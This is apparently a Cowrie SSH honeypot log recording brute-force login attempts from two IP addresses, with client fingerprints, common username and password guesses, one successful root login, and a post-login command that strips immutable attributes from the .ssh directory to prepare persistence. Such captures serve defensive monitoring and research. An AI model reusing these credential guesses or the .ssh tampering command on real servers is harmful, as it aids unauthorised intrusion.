{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:00:02.986986Z","src_ip":"212.227.235.229","session":"67947d3f6272"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T08:00:03.021008Z","src_ip":"212.227.125.160","session":"39cbcd331230"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:00:03.084633Z","src_ip":"212.227.235.229","session":"67947d3f6272"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T08:00:03.124664Z","src_ip":"212.227.125.160","session":"39cbcd331230"}
{"eventid":"cowrie.login.failed","username":"ftpadmin","password":"qwerty","message":"login attempt [ftpadmin/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T08:00:03.489488Z","src_ip":"212.227.235.229","session":"67947d3f6272"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:00:04.585822Z","src_ip":"212.227.235.229","session":"67947d3f6272"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234","message":"login attempt [user/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T08:00:05.174318Z","src_ip":"212.227.125.160","session":"39cbcd331230"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:00:06.508746Z","src_ip":"212.227.125.160","session":"39cbcd331230"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58396,"dst_ip":"1.2.3.4","dst_port":22,"session":"98fd40cdae3f","protocol":"ssh","message":"New connection: 212.227.125.160:58396 (1.2.3.4:22) [session: 98fd40cdae3f]","sensor":"my-vps","timestamp":"2025-09-09T08:00:08.783497Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T08:00:08.839201Z","src_ip":"212.227.125.160","session":"98fd40cdae3f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T08:00:09.085499Z","src_ip":"212.227.125.160","session":"98fd40cdae3f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-09-09T08:00:13.410825Z","src_ip":"212.227.125.160","session":"98fd40cdae3f"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:00:15.371920Z","src_ip":"212.227.125.160","session":"98fd40cdae3f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56432,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a16faf083f5","protocol":"ssh","message":"New connection: 212.227.235.229:56432 (1.2.3.4:22) [session: 4a16faf083f5]","sensor":"my-vps","timestamp":"2025-09-09T08:00:26.641180Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T08:00:26.642044Z","src_ip":"212.227.235.229","session":"4a16faf083f5"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-09T08:00:26.745822Z","src_ip":"212.227.235.229","session":"4a16faf083f5"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"5f:e1:83:b8:06:0b:75:c6:4d:dc:35:f9:7f:6c:e9:76","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsjH55p76agEZ4UuXEzlTwtDq74vjFh/0uex4Lu3U7TECNx0739XE2mVQiQkM91Kixcwa/iNf1zi+UKOU8JmFpt5z7fZYuXhAyUUfG7ZEqrmCf4v2/HGJGtk99Sskkmt8qy8dltbQwujEEPi5p5UWYdaNBpDe5xBVbol585pmUBH5tWWK9JNhxrEgVkvz8bnuHalsCQBFG4WWse6s5kv/feRTvQiCUC8HgTh/ndVLUdbwxr7Ot4WKJswllGIm/77WSQLNWTqpa3RG9DzPs7fydd/6Jg4O/JUXqI0Qwk11XvPi9I+NtoKNZgCaH6uI4jEe9CqcTFCrNrZGc+h/cQnW9","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 5f:e1:83:b8:06:0b:75:c6:4d:dc:35:f9:7f:6c:e9:76","sensor":"my-vps","timestamp":"2025-09-09T08:00:26.955432Z","src_ip":"212.227.235.229","session":"4a16faf083f5"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"5f:e1:83:b8:06:0b:75:c6:4d:dc:35:f9:7f:6c:e9:76","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsjH55p76agEZ4UuXEzlTwtDq74vjFh/0uex4Lu3U7TECNx0739XE2mVQiQkM91Kixcwa/iNf1zi+UKOU8JmFpt5z7fZYuXhAyUUfG7ZEqrmCf4v2/HGJGtk99Sskkmt8qy8dltbQwujEEPi5p5UWYdaNBpDe5xBVbol585pmUBH5tWWK9JNhxrEgVkvz8bnuHalsCQBFG4WWse6s5kv/feRTvQiCUC8HgTh/ndVLUdbwxr7Ot4WKJswllGIm/77WSQLNWTqpa3RG9DzPs7fydd/6Jg4O/JUXqI0Qwk11XvPi9I+NtoKNZgCaH6uI4jEe9CqcTFCrNrZGc+h/cQnW9","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T08:00:26.956790Z","src_ip":"212.227.235.229","session":"4a16faf083f5"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"5f:e1:83:b8:06:0b:75:c6:4d:dc:35:f9:7f:6c:e9:76","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsjH55p76agEZ4UuXEzlTwtDq74vjFh/0uex4Lu3U7TECNx0739XE2mVQiQkM91Kixcwa/iNf1zi+UKOU8JmFpt5z7fZYuXhAyUUfG7ZEqrmCf4v2/HGJGtk99Sskkmt8qy8dltbQwujEEPi5p5UWYdaNBpDe5xBVbol585pmUBH5tWWK9JNhxrEgVkvz8bnuHalsCQBFG4WWse6s5kv/feRTvQiCUC8HgTh/ndVLUdbwxr7Ot4WKJswllGIm/77WSQLNWTqpa3RG9DzPs7fydd/6Jg4O/JUXqI0Qwk11XvPi9I+NtoKNZgCaH6uI4jEe9CqcTFCrNrZGc+h/cQnW9","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 5f:e1:83:b8:06:0b:75:c6:4d:dc:35:f9:7f:6c:e9:76","sensor":"my-vps","timestamp":"2025-09-09T08:00:27.061235Z","src_ip":"212.227.235.229","session":"4a16faf083f5"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"5f:e1:83:b8:06:0b:75:c6:4d:dc:35:f9:7f:6c:e9:76","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsjH55p76agEZ4UuXEzlTwtDq74vjFh/0uex4Lu3U7TECNx0739XE2mVQiQkM91Kixcwa/iNf1zi+UKOU8JmFpt5z7fZYuXhAyUUfG7ZEqrmCf4v2/HGJGtk99Sskkmt8qy8dltbQwujEEPi5p5UWYdaNBpDe5xBVbol585pmUBH5tWWK9JNhxrEgVkvz8bnuHalsCQBFG4WWse6s5kv/feRTvQiCUC8HgTh/ndVLUdbwxr7Ot4WKJswllGIm/77WSQLNWTqpa3RG9DzPs7fydd/6Jg4O/JUXqI0Qwk11XvPi9I+NtoKNZgCaH6uI4jEe9CqcTFCrNrZGc+h/cQnW9","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T08:00:27.062026Z","src_ip":"212.227.235.229","session":"4a16faf083f5"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:00:36.641166Z","src_ip":"212.227.235.229","session":"4a16faf083f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48786,"dst_ip":"1.2.3.4","dst_port":22,"session":"90434be85f67","protocol":"ssh","message":"New connection: 212.227.125.160:48786 (1.2.3.4:22) [session: 90434be85f67]","sensor":"my-vps","timestamp":"2025-09-09T08:01:01.871184Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T08:01:01.877416Z","src_ip":"212.227.125.160","session":"90434be85f67"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T08:01:08.514609Z","src_ip":"212.227.125.160","session":"90434be85f67"}
{"eventid":"cowrie.login.failed","username":"admin","password":"default","message":"login attempt [admin/default] failed","sensor":"my-vps","timestamp":"2025-09-09T08:01:11.218976Z","src_ip":"212.227.125.160","session":"90434be85f67"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:01:12.536510Z","src_ip":"212.227.125.160","session":"90434be85f67"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44262,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfcb406c2fa2","protocol":"ssh","message":"New connection: 212.227.235.229:44262 (1.2.3.4:22) [session: bfcb406c2fa2]","sensor":"my-vps","timestamp":"2025-09-09T08:01:13.007740Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:01:13.008699Z","src_ip":"212.227.235.229","session":"bfcb406c2fa2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:01:13.092265Z","src_ip":"212.227.235.229","session":"bfcb406c2fa2"}
{"eventid":"cowrie.login.success","username":"root","password":"09N1RCa1Hs31","message":"login attempt [root/09N1RCa1Hs31] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:01:13.469784Z","src_ip":"212.227.235.229","session":"bfcb406c2fa2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:01:13.657750Z","src_ip":"212.227.235.229","session":"bfcb406c2fa2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:01:13.658516Z","src_ip":"212.227.235.229","session":"bfcb406c2fa2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:01:13.659544Z","src_ip":"212.227.235.229","session":"bfcb406c2fa2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:01:13.744256Z","src_ip":"212.227.235.229","session":"bfcb406c2fa2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:01:14.015267Z","src_ip":"212.227.235.229","session":"bfcb406c2fa2"}
